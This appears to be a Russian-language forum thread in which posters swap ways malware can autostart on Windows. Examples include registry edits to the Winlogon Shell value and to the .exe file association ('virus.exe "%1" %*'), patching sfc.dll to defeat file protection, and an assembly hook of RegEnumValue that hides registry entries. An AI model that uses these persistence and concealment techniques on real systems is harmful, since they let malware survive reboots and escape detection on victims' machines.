Разумеется, каждому вирусу хочется, что бы его запустили. А лучше, чтобы после первого запуска и впредь постоянно запускали и запускали.
Большинство вирусов любит прописываться в CurrentVersion/Run
Это настолько банально, что я вычищаю большинство вирусов вручную редактором реестра, без всяких антивирусов.

А какие есть другие места для автозапуска? Не обязательно прямые, но и косвенно ведущие к запуску.
Например, один из вирусов (не знаю, как называется) просто связывал себя с расширением .exe. Таким образом, любой запуск exe-файла производился посредством вируса.

Есть и другие идею, например, можно переписать в реестре ссылки на протоколы. Например, связать протокол http: со своим классом - и каждый раз когда пользователь будет лезть в инет, будет вызываться разаражённый COM-объект.


Какие ещё есть возможности автозапуска?

Dan
Посмотри на www.sysinternals.com утилиту Autoruns

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
стандартное значение

"Shell" = "Explorer.exe"
изменяется на

"Shell" = "Explorer.exe [путь и имя файла троянской программы]"

чтоб запускался с каждой программой:

[HKCR\exefile\shell\open\command]
@="\"%1\" %*"

меняетса на:
@="virus.exe \"%1\" %*"

virus.exe соответсвенно должен парсить коммандную строку и запускать данное приложенние

Легче регедит пропатчить имхо.

hello_world

Не совсем поняла что Вы имели в виду под пропатчить regedit?

hello_world :сложнее. вспомним про SFP в 2К и XP

rst
Но твикеры его как-то отключают...

Quantum

Поиск по форуму, старый приятель :)
Делается падч на sfc.dll и ключик в реестре. Тема называлась SFC - там я объяснял как это сделать :)

Да. Куда интереснее понять как это делает SP. Ведь SP тоже заменяет файлы, но при этом винда не протестует. Где-то я читал об этом, просто времени нет поковыряться...

Да. Куда интереснее понять как это делает SP. Ведь SP тоже заменяет файлы, но при этом винда не протестует. Где-то я читал об этом, просто времени нет поковыряться...
Вот это меня и интересует как раз -)
Насколько я знаю - там дело в том , что при апдейте создаются каталоги (.cat) файлы. Где находятся подписи всех заменяемых экзешников. Подписано все естественно мелкософтовским ключем.

Ну ёпрст, задачка же тривиальная. Вот пример обработчика RegEnumValueA/W который тупо ключ скрывает(и все которые после него идут)

MyRegEnumValue	proc		hKey		:dword,\
				dwIndex		:dword,\
				lpValueName	:dword,\
				lpcbValueName	:dword,\
				lpReserved	:dword,\
				lpType		:dword,\
				lpData		:dword,\
				lpcbData	:dword


push	eax
mov	eax,ERROR_NO_MORE_ITEMS

call	@f
myval_a	db 'some value in run',0
@@:
pop	edi
mov	esi,lpValueName
push	sizeof myval_a
pop	ecx
repz	cmpsb
jz	___MyRegEnumValueEnd

call	@f
myval_u	db 'b',0,'l',0,'a',0,'h',0,0
@@:
pop	edi
mov	esi,lpValueName
push	sizeof myval_u
pop	ecx
repz	cmpsb
jz	___MyRegEnumValueEnd

pop	eax

___MyRegEnumValueEnd:

ret

MyRegEnumValue		endp

Подписано все естественно мелкософтовским ключем.

А как осуществляется проверка? Если ключи лежат пусть и в разных файлах, то криптостойкость теоретически равна нулю.

volodya
А как осуществляется проверка? Если ключи лежат пусть и в разных файлах, то криптостойкость теоретически равна нулю.

5 сек ! Я кое-что уже пишу в тему WFP или нужна помощь

http://msdn.microsoft.com/library/en-us/msi/setup/windows_file_protect ion_on_windows_2000_and_windows_xp.asp

http://msdn.microsoft.com/library/en-us/msi/setup/windows_file_protect ion_on_windows_millennium_edition.asp

И в добавок по адвертайзингу (это когда инсталлер постоянно пытается восстановить удаленный файл) :
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/msi/s etup/advertisement.asp